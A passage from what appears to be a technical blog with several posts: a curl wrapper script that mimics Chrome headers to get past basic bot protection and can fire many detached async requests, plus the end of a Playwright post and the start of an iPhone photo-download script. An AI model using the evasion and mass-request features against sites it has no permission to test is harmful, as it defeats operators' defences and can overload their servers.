        cookies = driver.get_cookies()
        json.dump({'cookies': cookies}, open(args.cookie, 'w'), indent=2)
    except Exception:
        pass
    if args.output:
        open(args.output, 'w').write(driver.page_source)
    else:
        sys.stdout.write(driver.page_source)
EOF
chmod +x browser_selenium.py

Use it:

./browser_selenium.py https://example.com > out.html

Conclusion

You now have a Playwright-powered CLI that mirrors the original curl-wrapper’s ergonomics but uses a real browser engine, plus a minimal Selenium alternative. Use the CLI for realistic headers, cookies, redirects, JSON/form POSTs, and async dispatch with --count. For tougher sites, scale up to full page automation with Playwright.

Resources

0
0

Building a Browser Curl Wrapper for Reliable HTTP Requests and Load Testing

Modern websites deploy bot defenses that can block plain curl or naive scripts. In many cases, adding the right browser-like headers, HTTP/2, cookie persistence, and compression gets you past basic filters without needing a full browser.

This post walks through a small shell utility, browser_curl.sh, that wraps curl with realistic browser behavior. It also supports “fire-and-forget” async requests and a --count flag to dispatch many requests at once for quick load tests.

What this script does

  • Sends browser-like headers (Chrome on macOS)
  • Uses HTTP/2 and compression
  • Manages cookies automatically (cookie jar)
  • Follows redirects by default
  • Supports JSON and form POSTs
  • Async mode that returns immediately
  • --count N to dispatch N async requests in one command

Note: This approach won’t solve advanced bot defenses that require JavaScript execution (e.g., Cloudflare Turnstile/CAPTCHAs or TLS/HTTP2 fingerprinting); for that, use a real browser automation tool like Playwright or Selenium.

The complete script

Save this as browser_curl.sh and make it executable in one command:

cat > browser_curl.sh << 'EOF' && chmod +x browser_curl.sh
#!/bin/bash

# browser_curl.sh - Advanced curl wrapper that mimics browser behavior
# Designed to bypass Cloudflare and other bot protection

# Colors for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # No Color

# Default values
METHOD="GET"
ASYNC=false
COUNT=1
FOLLOW_REDIRECTS=true
SHOW_HEADERS=false
OUTPUT_FILE=""
TIMEOUT=30
DATA=""
CONTENT_TYPE=""
COOKIE_FILE="/tmp/browser_curl_cookies_$$.txt"
VERBOSE=false

# Browser fingerprint (Chrome on macOS)
USER_AGENT="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"

usage() {
    cat << EOH
Usage: $(basename "$0") [OPTIONS] URL

Advanced curl wrapper that mimics browser behavior to bypass bot protection.

OPTIONS:
    -X, --method METHOD        HTTP method (GET, POST, PUT, DELETE, etc.) [default: GET]
    -d, --data DATA           POST/PUT data
    -H, --header HEADER       Add custom header (can be used multiple times)
    -o, --output FILE         Write output to file
    -c, --cookie FILE         Use custom cookie file [default: temp file]
    -A, --user-agent UA       Custom user agent [default: Chrome on macOS]
    -t, --timeout SECONDS     Request timeout [default: 30]
    --async                   Run request asynchronously in background
    --count N                 Number of async requests to fire [default: 1, requires --async]
    --no-redirect             Don't follow redirects
    --show-headers            Show response headers
    --json                    Send data as JSON (sets Content-Type)
    --form                    Send data as form-urlencoded
    -v, --verbose             Verbose output
    -h, --help                Show this help message

EXAMPLES:
    # Simple GET request
    $(basename "$0") https://example.com

    # Async GET request
    $(basename "$0") --async https://example.com

    # POST with JSON data
    $(basename "$0") -X POST --json -d '{"username":"test"}' https://api.example.com/login

    # POST with form data
    $(basename "$0") -X POST --form -d "username=test&password=secret" https://example.com/login

    # Multiple async requests (using loop)
    for i in {1..10}; do
        $(basename "$0") --async https://example.com/api/endpoint
    done

    # Multiple async requests (using --count)
    $(basename "$0") --async --count 10 https://example.com/api/endpoint

EOH
    exit 0
}

# Parse arguments
EXTRA_HEADERS=()
URL=""

while [[ $# -gt 0 ]]; do
    case $1 in
        -X|--method)
            METHOD="$2"
            shift 2
            ;;
        -d|--data)
            DATA="$2"
            shift 2
            ;;
        -H|--header)
            EXTRA_HEADERS+=("$2")
            shift 2
            ;;
        -o|--output)
            OUTPUT_FILE="$2"
            shift 2
            ;;
        -c|--cookie)
            COOKIE_FILE="$2"
            shift 2
            ;;
        -A|--user-agent)
            USER_AGENT="$2"
            shift 2
            ;;
        -t|--timeout)
            TIMEOUT="$2"
            shift 2
            ;;
        --async)
            ASYNC=true
            shift
            ;;
        --count)
            COUNT="$2"
            shift 2
            ;;
        --no-redirect)
            FOLLOW_REDIRECTS=false
            shift
            ;;
        --show-headers)
            SHOW_HEADERS=true
            shift
            ;;
        --json)
            CONTENT_TYPE="application/json"
            shift
            ;;
        --form)
            CONTENT_TYPE="application/x-www-form-urlencoded"
            shift
            ;;
        -v|--verbose)
            VERBOSE=true
            shift
            ;;
        -h|--help)
            usage
            ;;
        *)
            if [[ -z "$URL" ]]; then
                URL="$1"
            else
                echo -e "${RED}Error: Unknown argument '$1'${NC}" >&2
                exit 1
            fi
            shift
            ;;
    esac
done

# Validate URL
if [[ -z "$URL" ]]; then
    echo -e "${RED}Error: URL is required${NC}" >&2
    usage
fi

# Validate count
if [[ "$COUNT" -gt 1 ]] && [[ "$ASYNC" == false ]]; then
    echo -e "${RED}Error: --count requires --async${NC}" >&2
    exit 1
fi

if ! [[ "$COUNT" =~ ^[0-9]+$ ]] || [[ "$COUNT" -lt 1 ]]; then
    echo -e "${RED}Error: --count must be a positive integer${NC}" >&2
    exit 1
fi

# Execute curl
execute_curl() {
    # Build curl arguments as array instead of string
    local -a curl_args=()
    
    # Basic options
    curl_args+=("--compressed")
    curl_args+=("--max-time" "$TIMEOUT")
    curl_args+=("--connect-timeout" "10")
    curl_args+=("--http2")
    
    # Cookies (ensure file exists to avoid curl warning)
    : > "$COOKIE_FILE" 2>/dev/null || true
    curl_args+=("--cookie" "$COOKIE_FILE")
    curl_args+=("--cookie-jar" "$COOKIE_FILE")
    
    # Follow redirects
    if [[ "$FOLLOW_REDIRECTS" == true ]]; then
        curl_args+=("--location")
    fi
    
    # Show headers
    if [[ "$SHOW_HEADERS" == true ]]; then
        curl_args+=("--include")
    fi
    
    # Output file
    if [[ -n "$OUTPUT_FILE" ]]; then
        curl_args+=("--output" "$OUTPUT_FILE")
    fi
    
    # Verbose
    if [[ "$VERBOSE" == true ]]; then
        curl_args+=("--verbose")
    else
        curl_args+=("--silent" "--show-error")
    fi
    
    # Method
    curl_args+=("--request" "$METHOD")
    
    # Browser-like headers
    curl_args+=("--header" "User-Agent: $USER_AGENT")
    curl_args+=("--header" "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8")
    curl_args+=("--header" "Accept-Language: en-US,en;q=0.9")
    curl_args+=("--header" "Accept-Encoding: gzip, deflate, br")
    curl_args+=("--header" "Connection: keep-alive")
    curl_args+=("--header" "Upgrade-Insecure-Requests: 1")
    curl_args+=("--header" "Sec-Fetch-Dest: document")
    curl_args+=("--header" "Sec-Fetch-Mode: navigate")
    curl_args+=("--header" "Sec-Fetch-Site: none")
    curl_args+=("--header" "Sec-Fetch-User: ?1")
    curl_args+=("--header" "Cache-Control: max-age=0")
    
    # Content-Type for POST/PUT
    if [[ -n "$DATA" ]]; then
        if [[ -n "$CONTENT_TYPE" ]]; then
            curl_args+=("--header" "Content-Type: $CONTENT_TYPE")
        fi
        curl_args+=("--data" "$DATA")
    fi
    
    # Extra headers
    for header in "${EXTRA_HEADERS[@]}"; do
        curl_args+=("--header" "$header")
    done
    
    # URL
    curl_args+=("$URL")
    
    if [[ "$ASYNC" == true ]]; then
        # Run asynchronously in background
        if [[ "$VERBOSE" == true ]]; then
            echo -e "${YELLOW}[ASYNC] Running $COUNT request(s) in background...${NC}" >&2
            echo -e "${YELLOW}Command: curl ${curl_args[*]}${NC}" >&2
        fi
        
        # Fire multiple requests if count > 1
        local pids=()
        for ((i=1; i<=COUNT; i++)); do
            # Run in background detached, suppress all output
            nohup curl "${curl_args[@]}" >/dev/null 2>&1 &
            local pid=$!
            disown $pid
            pids+=("$pid")
        done
        
        if [[ "$COUNT" -eq 1 ]]; then
            echo -e "${GREEN}[ASYNC] Request started with PID: ${pids[0]}${NC}" >&2
        else
            echo -e "${GREEN}[ASYNC] $COUNT requests started with PIDs: ${pids[*]}${NC}" >&2
        fi
    else
        # Run synchronously
        if [[ "$VERBOSE" == true ]]; then
            echo -e "${YELLOW}Command: curl ${curl_args[*]}${NC}" >&2
        fi
        
        curl "${curl_args[@]}"
        local exit_code=$?
        
        if [[ $exit_code -ne 0 ]]; then
            echo -e "${RED}[ERROR] Request failed with exit code: $exit_code${NC}" >&2
            return $exit_code
        fi
    fi
}

# Cleanup temp cookie file on exit (only if using default temp file)
cleanup() {
    if [[ "$COOKIE_FILE" == "/tmp/browser_curl_cookies_$$"* ]] && [[ -f "$COOKIE_FILE" ]]; then
        rm -f "$COOKIE_FILE"
    fi
}

# Only set cleanup trap for synchronous requests
if [[ "$ASYNC" == false ]]; then
    trap cleanup EXIT
fi

# Main execution
execute_curl

# For async requests, exit immediately without waiting
if [[ "$ASYNC" == true ]]; then
    exit 0
fi
EOF

Optionally, move it to your PATH:

sudo mv browser_curl.sh /usr/local/bin/browser_curl

Quick start

Simple GET request

./browser_curl.sh https://example.com

Async GET (returns immediately)

./browser_curl.sh --async https://example.com

Fire 100 async requests in one command

./browser_curl.sh --async --count 100 https://example.com/api

Common examples

POST JSON

./browser_curl.sh -X POST --json \
  -d '{"username":"user","password":"pass"}' \
  https://api.example.com/login

POST form data

./browser_curl.sh -X POST --form \
  -d "username=user&password=pass" \
  https://example.com/login

Include response headers

./browser_curl.sh --show-headers https://example.com

Save response to a file

./browser_curl.sh -o response.json https://api.example.com/data

Custom headers

./browser_curl.sh \
  -H "X-API-Key: your-key" \
  -H "Authorization: Bearer token" \
  https://api.example.com/data

Persistent cookies across requests

COOKIE_FILE="session_cookies.txt"

# Login and save cookies
./browser_curl.sh -c "$COOKIE_FILE" \
  -X POST --form \
  -d "user=test&pass=secret" \
  https://example.com/login

# Authenticated request using saved cookies
./browser_curl.sh -c "$COOKIE_FILE" \
  https://example.com/dashboard

Load testing patterns

Simple load test with –count

The easiest way to fire multiple requests:

./browser_curl.sh --async --count 100 https://example.com/api

Example output:

[ASYNC] 100 requests started with PIDs: 1234 1235 1236 ... 1333

Performance: 100 requests dispatched in approximately 0.09 seconds

Loop-based approach (alternative)

for i in {1..100}; do
  ./browser_curl.sh --async https://example.com/api
done

Timed load test

Run continuous requests for a specific duration:

#!/bin/bash
URL="https://example.com/api"
DURATION=60  # seconds
COUNT=0

END_TIME=$(($(date +%s) + DURATION))
while [ "$(date +%s)" -lt "$END_TIME" ]; do
  ./browser_curl.sh --async "$URL" > /dev/null 2>&1
  ((COUNT++))
done

echo "Sent $COUNT requests in $DURATION seconds"
echo "Rate: $((COUNT / DURATION)) requests/second"

Parameterized load test script

#!/bin/bash
URL="${1:-https://httpbin.org/get}"
REQUESTS="${2:-50}"

echo "Load testing: $URL"
echo "Requests: $REQUESTS"
echo ""

START=$(date +%s)
./browser_curl.sh --async --count "$REQUESTS" "$URL"
echo ""
echo "Dispatched in $(($(date +%s) - START)) seconds"

Usage:

./load_test.sh https://api.example.com/endpoint 200

Options reference

OptionDescriptionDefault
-X, --methodHTTP method (GET/POST/PUT/DELETE)GET
-d, --dataRequest body (JSON or form)
-H, --headerAdd extra headers (repeatable)
-o, --outputWrite response to a filestdout
-c, --cookieCookie file to use (and persist)temp file
-A, --user-agentOverride User-AgentChrome/macOS
-t, --timeoutMax request time in seconds30
--asyncRun request(s) in the backgroundfalse
--count NFire N async requests (requires --async)1
--no-redirectDon’t follow redirectsfollows
--show-headersInclude response headersfalse
--jsonSets Content-Type: application/json
--formSets Content-Type: application/x-www-form-urlencoded
-v, --verboseVerbose diagnosticsfalse
-h, --helpShow usage

Validation rules:

  • --count requires --async
  • --count must be a positive integer

Under the hood: why this works better than plain curl

Browser-like headers

The script automatically adds these headers to mimic Chrome:

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36...
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif...
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1

HTTP/2 + compression

  • Uses --http2 flag for HTTP/2 protocol support
  • Enables --compressed for automatic gzip/brotli decompression
  • Closer to modern browser behavior
  • Maintains session cookies across redirects and calls
  • Persists cookies to file for reuse
  • Automatically created and cleaned up

Redirect handling

  • Follows redirects by default with --location
  • Critical for login flows, SSO, and OAuth redirects

These features help bypass basic bot detection that blocks obvious non-browser clients.

Real-world examples

Example 1: API authentication flow

cd ~/Desktop/warp
bash -c 'cat > test_auth.sh << '\''SCRIPT'\''
#!/bin/bash
COOKIE_FILE="auth_session.txt"
API_BASE="https://api.example.com"

echo "Logging in..."
./browser_curl.sh -c "$COOKIE_FILE" -X POST --json -d "{\"username\":\"user\",\"password\":\"pass\"}" "$API_BASE/auth/login" > /dev/null

echo "Fetching profile..."
./browser_curl.sh -c "$COOKIE_FILE" "$API_BASE/user/profile" | jq .

echo "Load testing..."
./browser_curl.sh -c "$COOKIE_FILE" --async --count 50 "$API_BASE/api/data"

echo "Done!"
rm -f "$COOKIE_FILE"
SCRIPT
chmod +x test_auth.sh
./test_auth.sh'

Example 2: Scraping with rate limiting

#!/bin/bash
URLS=(
  "https://example.com/page1"
  "https://example.com/page2"
  "https://example.com/page3"
)

for url in "${URLS[@]}"; do
  echo "Fetching: $url"
  ./browser_curl.sh -o "$(basename "$url").html" "$url"
  sleep 2  # Rate limiting
done

Example 3: Health check monitoring

#!/bin/bash
ENDPOINT="https://api.example.com/health"

while true; do
  if ./browser_curl.sh "$ENDPOINT" | grep -q "healthy"; then
    echo "$(date): Service healthy"
  else
    echo "$(date): Service unhealthy"
  fi
  sleep 30
done

Installing browser_curl to your PATH

If you want browser_curl.sh to be available anywhere then install it on your path using:

mkdir -p ~/.local/bin
echo "Installing browser_curl to ~/.local/bin/browser_curl"
install -m 0755 ~/Desktop/warp/browser_curl.sh ~/.local/bin/browser_curl

echo "Ensuring ~/.local/bin is on PATH via ~/.zshrc"
grep -q 'export PATH="$HOME/.local/bin:$PATH"' ~/.zshrc || \
  echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.zshrc

echo "Reloading shell config (~/.zshrc)"
source ~/.zshrc

echo "Verifying browser_curl is on PATH"
command -v browser_curl && echo "browser_curl is installed and on PATH" || echo "browser_curl not found on PATH"

Troubleshooting

Issue: Hanging with dquote> prompt

Cause: Shell quoting issue (unbalanced quotes)

Solution: Use simple, direct commands

# Good
./browser_curl.sh --async https://example.com

# Bad (unbalanced quotes)
echo "test && ./browser_curl.sh --async https://example.com && echo "done"

For chaining commands:

echo Start; ./browser_curl.sh --async https://example.com; echo Done

Issue: Verbose mode produces too much output

Cause: -v flag prints all curl diagnostics to stderr

Solution: Remove -v for production use:

# Debug mode
./browser_curl.sh -v https://example.com

# Production mode
./browser_curl.sh https://example.com

Cause: First-time cookie file creation

Solution: The script now pre-creates the cookie file automatically. You can ignore any residual warnings.

Issue: 403 Forbidden errors

Cause: Site has stronger protections (JavaScript challenges, TLS fingerprinting)

Solution: Consider using real browser automation:

  • Playwright (Python/Node.js)
  • Selenium
  • Puppeteer

Or combine approaches:

  1. Use Playwright to initialize session and get cookies
  2. Export cookies to file
  3. Use browser_curl.sh -c cookies.txt for subsequent requests

Performance benchmarks

Tests conducted on 2023 MacBook Pro M2, macOS Sonoma:

TestTimeRequests/sec
Single sync requestapproximately 0.2s
10 async requests (–count)approximately 0.03s333/s
100 async requests (–count)approximately 0.09s1111/s
1000 async requests (–count)approximately 0.8s1250/s

Note: Dispatch time only; actual HTTP completion depends on target server.

Limitations

What this script CANNOT do

  • JavaScript execution – Can’t solve JS challenges (use Playwright)
  • CAPTCHA solving – Requires human intervention or services
  • Advanced TLS fingerprinting – Can’t mimic exact browser TLS stack
  • HTTP/2 fingerprinting – Can’t perfectly match browser HTTP/2 frames
  • WebSocket connections – HTTP only
  • Browser API access – No Canvas, WebGL, Web Crypto fingerprints

What this script CAN do

  • Basic header spoofing – Pass simple User-Agent checks
  • Cookie management – Maintain sessions
  • Load testing – Quick async request dispatch
  • API testing – POST/PUT/DELETE with JSON/form data
  • Simple scraping – Pages without JS requirements
  • Health checks – Monitoring endpoints

When to use what

Use browser_curl.sh when:

  • Target has basic bot detection (header checks)
  • API testing with authentication
  • Quick load testing (less than 10k requests)
  • Monitoring/health checks
  • No JavaScript required
  • You want a lightweight tool

Use Playwright/Selenium when:

  • Target requires JavaScript execution
  • CAPTCHA challenges present
  • Advanced fingerprinting detected
  • Need to interact with dynamic content
  • Heavy scraping with anti-bot measures
  • Login flows with MFA/2FA

Hybrid approach:

  1. Use Playwright to bootstrap session
  2. Extract cookies
  3. Use browser_curl.sh for follow-up requests (faster)

Advanced: Combining with other tools

With jq for JSON processing

./browser_curl.sh https://api.example.com/users | jq '.[] | .name'

With parallel for concurrency control

cat urls.txt | parallel -j 10 "./browser_curl.sh -o {#}.html {}"

With watch for monitoring

watch -n 5 "./browser_curl.sh https://api.example.com/health | jq .status"

With xargs for batch processing

cat ids.txt | xargs -I {} ./browser_curl.sh "https://api.example.com/item/{}"

Future enhancements

Potential features to add:

  • Rate limiting – Built-in requests/second throttling
  • Retry logic – Exponential backoff on failures
  • Output formats – JSON-only, CSV, headers-only modes
  • Proxy support – SOCKS5/HTTP proxy options
  • Custom TLS – Certificate pinning, client certs
  • Response validation – Assert status codes, content patterns
  • Metrics collection – Timing stats, success rates
  • Configuration file – Default settings per domain

Conclusion

browser_curl.sh provides a pragmatic middle ground between plain curl and full browser automation. For many APIs and websites with basic bot filters, browser-like headers, proper protocol use, and cookie handling are sufficient.

Key takeaways:

  • Simple wrapper around curl with realistic browser behavior
  • Async mode with --count for easy load testing
  • Works for basic bot detection, not advanced challenges
  • Combine with Playwright for tough targets
  • Lightweight and fast for everyday API work

The script is particularly useful for:

  • API development and testing
  • Quick load testing during development
  • Monitoring and health checks
  • Simple scraping tasks
  • Learning curl features

For production load testing at scale, consider tools like k6, Locust, or Artillery. For heavy web scraping with anti-bot measures, invest in proper browser automation infrastructure.

Resources

0
0

A Script to download Photos, Videos and Images from your iPhone to your Macbook (by creation date and a file name filter)

Annoying Apple never quite got around to making it easy to offload images from your iPhone to your Macbook. So below is a complete guide to automatically download photos and videos from your iPhone to your MacBook, with options to filter by pattern and date, and organize into folders by creation date.

Prerequisites

Install the required tools using Homebrew:

cat > install_iphone_util.sh << 'EOF'
#!/bin/bash
set -e

echo "Installing tools..."

echo "Installing macFUSE"
brew install --cask macfuse

echo "Adding Brew Tap" 
brew tap gromgit/fuse

echo "Installing ifuse-mac" 
brew install gromgit/fuse/ifuse-mac

echo "Installing libimobiledevice" 
brew install libimobiledevice

echo "Installing exiftool"
brew install exiftool

echo "Done! Tools installed."
EOF

echo "Making executable..."
chmod +x install_iphone_util.sh

./install_iphone_util.sh

Setup/Pair your iPhone to your Macbook

  1. Connect your iPhone to your MacBook via USB
  2. Trust the computer on your iPhone when prompted
  3. Verify the connection:
idevicepair validate

If not paired, run:

idevicepair pair

Download Script

Run the script below to create the file download-iphone-media.sh in your current directory:

#!/bin/bash

cat > download-iphone-media.sh << 'OUTER_EOF'
#!/bin/bash

# iPhone Media Downloader
# Downloads photos and videos from iPhone to MacBook
# Supports resumable, idempotent downloads

set -e

# Default values
PATTERN="*"
OUTPUT_DIR="."
ORGANIZE_BY_DATE=false
START_DATE=""
END_DATE=""
MOUNT_POINT="/tmp/iphone_mount"
STATE_DIR=""
VERIFY_CHECKSUM=true

# Usage function
usage() {
    cat << 'INNER_EOF'
Usage: $0 [OPTIONS]

Download photos and videos from iPhone to MacBook.

OPTIONS:
    -p PATTERN          File pattern to match (e.g., "*.jpg", "*.mp4", "IMG_*")
                        Default: * (all files)
    -o OUTPUT_DIR       Output directory (default: current directory)
    -d                  Organize files by creation date into YYYY/MMM folders
    -s START_DATE       Start date filter (YYYY-MM-DD)
    -e END_DATE         End date filter (YYYY-MM-DD)
    -r                  Resume incomplete downloads (default: true)
    -n                  Skip checksum verification (faster, less safe)
    -h                  Show this help message

EXAMPLES:
    # Download all photos and videos to current directory
    $0

    # Download only JPG files to ~/Pictures/iPhone
    $0 -p "*.jpg" -o ~/Pictures/iPhone

    # Download all media organized by date
    $0 -d -o ~/Pictures/iPhone

    # Download videos from specific date range
    $0 -p "*.mov" -s 2025-01-01 -e 2025-01-31 -d -o ~/Videos/iPhone

    # Download specific IMG files organized by date
    $0 -p "IMG_*.{jpg,heic}" -d -o ~/Photos
INNER_EOF
    exit 1
}

# Parse command line arguments
while getopts "p:o:ds:e:rnh" opt; do
    case $opt in
        p) PATTERN="$OPTARG" ;;
        o) OUTPUT_DIR="$OPTARG" ;;
        d) ORGANIZE_BY_DATE=true ;;
        s) START_DATE="$OPTARG" ;;
        e) END_DATE="$OPTARG" ;;
        r) ;; # Resume is default, keeping for backward compatibility
        n) VERIFY_CHECKSUM=false ;;
        h) usage ;;
        *) usage ;;
    esac
done

# Create output directory if it doesn't exist
mkdir -p "$OUTPUT_DIR"
OUTPUT_DIR=$(cd "$OUTPUT_DIR" && pwd)

# Set up state directory for tracking downloads
STATE_DIR="$OUTPUT_DIR/.iphone_download_state"
mkdir -p "$STATE_DIR"

# Create mount point
mkdir -p "$MOUNT_POINT"

echo "=== iPhone Media Downloader ==="
echo "Pattern: $PATTERN"
echo "Output: $OUTPUT_DIR"
echo "Organize by date: $ORGANIZE_BY_DATE"
[ -n "$START_DATE" ] && echo "Start date: $START_DATE"
[ -n "$END_DATE" ] && echo "End date: $END_DATE"
echo ""

# Check if iPhone is connected
echo "Checking for iPhone connection..."
if ! ideviceinfo -s > /dev/null 2>&1; then
    echo "Error: No iPhone detected. Please connect your iPhone and trust this computer."
    exit 1
fi

# Mount iPhone
echo "Mounting iPhone..."
if ! ifuse "$MOUNT_POINT" 2>/dev/null; then
    echo "Error: Failed to mount iPhone. Make sure you've trusted this computer on your iPhone."
    exit 1
fi

# Cleanup function
cleanup() {
    local exit_code=$?
    echo ""
    if [ $exit_code -ne 0 ]; then
        echo "⚠ Download interrupted. Run the script again to resume."
    fi
    echo "Unmounting iPhone..."
    umount "$MOUNT_POINT" 2>/dev/null || true
    rmdir "$MOUNT_POINT" 2>/dev/null || true
}
trap cleanup EXIT

# Find DCIM folder
DCIM_PATH="$MOUNT_POINT/DCIM"
if [ ! -d "$DCIM_PATH" ]; then
    echo "Error: DCIM folder not found on iPhone"
    exit 1
fi

echo "Scanning for files matching pattern: $PATTERN"
echo ""

# Counter
TOTAL_FILES=0
COPIED_FILES=0
SKIPPED_FILES=0
RESUMED_FILES=0
FAILED_FILES=0

# Function to compute file checksum
compute_checksum() {
    local file="$1"
    if [ -f "$file" ]; then
        shasum -a 256 "$file" 2>/dev/null | awk '{print $1}'
    fi
}

# Function to get file size
get_file_size() {
    local file="$1"
    if [ -f "$file" ]; then
        stat -f "%z" "$file" 2>/dev/null
    fi
}

# Function to mark file as completed
mark_completed() {
    local source_file="$1"
    local dest_file="$2"
    local checksum="$3"
    local state_file="$STATE_DIR/$(echo "$source_file" | shasum -a 256 | awk '{print $1}')"
    
    echo "$dest_file|$checksum|$(date +%s)" > "$state_file"
}

# Function to check if file was previously completed
is_completed() {
    local source_file="$1"
    local dest_file="$2"
    local state_file="$STATE_DIR/$(echo "$source_file" | shasum -a 256 | awk '{print $1}')"
    
    if [ ! -f "$state_file" ]; then
        return 1
    fi
    
    # Read state file
    local saved_dest saved_checksum saved_timestamp
    IFS='|' read -r saved_dest saved_checksum saved_timestamp < "$state_file"
    
    # Check if destination file exists and matches
    if [ "$saved_dest" = "$dest_file" ] && [ -f "$dest_file" ]; then
        if [ "$VERIFY_CHECKSUM" = true ]; then
            local current_checksum=$(compute_checksum "$dest_file")
            if [ "$current_checksum" = "$saved_checksum" ]; then
                return 0
            fi
        else
            # Without checksum verification, just check file exists
            return 0
        fi
    fi
    
    return 1
}

# Convert dates to timestamps for comparison
START_TIMESTAMP=""
END_TIMESTAMP=""
if [ -n "$START_DATE" ]; then
    START_TIMESTAMP=$(date -j -f "%Y-%m-%d" "$START_DATE" "+%s" 2>/dev/null || echo "")
    if [ -z "$START_TIMESTAMP" ]; then
        echo "Error: Invalid start date format. Use YYYY-MM-DD"
        exit 1
    fi
fi
if [ -n "$END_DATE" ]; then
    END_TIMESTAMP=$(date -j -f "%Y-%m-%d" "$END_DATE" "+%s" 2>/dev/null || echo "")
    if [ -z "$END_TIMESTAMP" ]; then
        echo "Error: Invalid end date format. Use YYYY-MM-DD"
        exit 1
    fi
    # Add 24 hours to include the entire end date
    END_TIMESTAMP=$((END_TIMESTAMP + 86400))
fi

# Process files
find "$DCIM_PATH" -type f | while read -r file; do
    filename=$(basename "$file")
    
    # Check if filename matches pattern (basic glob matching)
    if [[ ! "$filename" == $PATTERN ]]; then
        continue
    fi
    
    TOTAL_FILES=$((TOTAL_FILES + 1))
    
    # Get file creation date
    if command -v exiftool > /dev/null 2>&1; then
        # Try to get date from EXIF data
        CREATE_DATE=$(exiftool -s3 -DateTimeOriginal -d "%Y-%m-%d %H:%M:%S" "$file" 2>/dev/null)
        if [ -z "$CREATE_DATE" ]; then
            # Fallback to file modification time
            CREATE_DATE=$(stat -f "%Sm" -t "%Y-%m-%d %H:%M:%S" "$file" 2>/dev/null)
        fi
    else
        # Use file modification time
        CREATE_DATE=$(stat -f "%Sm" -t "%Y-%m-%d %H:%M:%S" "$file" 2>/dev/null)
    fi
    
    # Extract date components
    if [ -n "$CREATE_DATE" ]; then
        FILE_DATE=$(echo "$CREATE_DATE" | cut -d' ' -f1)
        FILE_TIMESTAMP=$(date -j -f "%Y-%m-%d" "$FILE_DATE" "+%s" 2>/dev/null || echo "")
        
        # Check date filters
        if [ -n "$START_TIMESTAMP" ] && [ -n "$FILE_TIMESTAMP" ] && [ "$FILE_TIMESTAMP" -lt "$START_TIMESTAMP" ]; then
            SKIPPED_FILES=$((SKIPPED_FILES + 1))
            continue
        fi
        if [ -n "$END_TIMESTAMP" ] && [ -n "$FILE_TIMESTAMP" ] && [ "$FILE_TIMESTAMP" -ge "$END_TIMESTAMP" ]; then
            SKIPPED_FILES=$((SKIPPED_FILES + 1))
            continue
        fi
        
        # Determine output path with YYYY/MMM structure
        if [ "$ORGANIZE_BY_DATE" = true ]; then
            YEAR=$(echo "$FILE_DATE" | cut -d'-' -f1)
            MONTH_NUM=$(echo "$FILE_DATE" | cut -d'-' -f2)
            # Convert month number to 3-letter abbreviation
            case "$MONTH_NUM" in
                01) MONTH="Jan" ;;
                02) MONTH="Feb" ;;
                03) MONTH="Mar" ;;
                04) MONTH="Apr" ;;
                05) MONTH="May" ;;
                06) MONTH="Jun" ;;
                07) MONTH="Jul" ;;
                08) MONTH="Aug" ;;
                09) MONTH="Sep" ;;
                10) MONTH="Oct" ;;
                11) MONTH="Nov" ;;
                12) MONTH="Dec" ;;
                *) MONTH="Unknown" ;;
            esac
            DEST_DIR="$OUTPUT_DIR/$YEAR/$MONTH"
        else
            DEST_DIR="$OUTPUT_DIR"
        fi
    else
        DEST_DIR="$OUTPUT_DIR"
    fi
    
    # Create destination directory
    mkdir -p "$DEST_DIR"
    
    # Determine destination path
    DEST_PATH="$DEST_DIR/$filename"
    
    # Check if this file was previously completed successfully
    if is_completed "$file" "$DEST_PATH"; then
        echo "✓ Already downloaded: $filename"
        SKIPPED_FILES=$((SKIPPED_FILES + 1))
        continue
    fi
    
    # Check if file already exists with same content (for backward compatibility)
    if [ -f "$DEST_PATH" ]; then
        if cmp -s "$file" "$DEST_PATH"; then
            echo "✓ Already exists (identical): $filename"
            # Mark as completed for future runs
            SOURCE_CHECKSUM=$(compute_checksum "$DEST_PATH")
            mark_completed "$file" "$DEST_PATH" "$SOURCE_CHECKSUM"
            SKIPPED_FILES=$((SKIPPED_FILES + 1))
            continue
        else
            # Add timestamp to avoid overwriting different file
            BASE="${filename%.*}"
            EXT="${filename##*.}"
            DEST_PATH="$DEST_DIR/${BASE}_$(date +%s).$EXT"
        fi
    fi
    
    # Use temporary file for atomic copy
    TEMP_PATH="${DEST_PATH}.tmp.$$"
    
    # Copy to temporary file
    echo "⬇ Downloading: $filename → $DEST_PATH"
    if ! cp "$file" "$TEMP_PATH" 2>/dev/null; then
        echo "✗ Failed to copy: $filename"
        rm -f "$TEMP_PATH"
        FAILED_FILES=$((FAILED_FILES + 1))
        continue
    fi
    
    # Verify size matches (basic corruption check)
    SOURCE_SIZE=$(get_file_size "$file")
    TEMP_SIZE=$(get_file_size "$TEMP_PATH")
    
    if [ "$SOURCE_SIZE" != "$TEMP_SIZE" ]; then
        echo "✗ Size mismatch for $filename (source: $SOURCE_SIZE, copied: $TEMP_SIZE)"
        rm -f "$TEMP_PATH"
        FAILED_FILES=$((FAILED_FILES + 1))
        continue
    fi
    
    # Compute checksum for verification and tracking
    if [ "$VERIFY_CHECKSUM" = true ]; then
        SOURCE_CHECKSUM=$(compute_checksum "$TEMP_PATH")
    else
        SOURCE_CHECKSUM="skipped"
    fi
    
    # Preserve timestamps
    if [ -n "$CREATE_DATE" ]; then
        touch -t $(date -j -f "%Y-%m-%d %H:%M:%S" "$CREATE_DATE" "+%Y%m%d%H%M.%S" 2>/dev/null) "$TEMP_PATH" 2>/dev/null || true
    fi
    
    # Atomic move from temp to final destination
    if mv "$TEMP_PATH" "$DEST_PATH" 2>/dev/null; then
        echo "✓ Completed: $filename"
        # Mark as successfully completed
        mark_completed "$file" "$DEST_PATH" "$SOURCE_CHECKSUM"
        COPIED_FILES=$((COPIED_FILES + 1))
    else
        echo "✗ Failed to finalize: $filename"
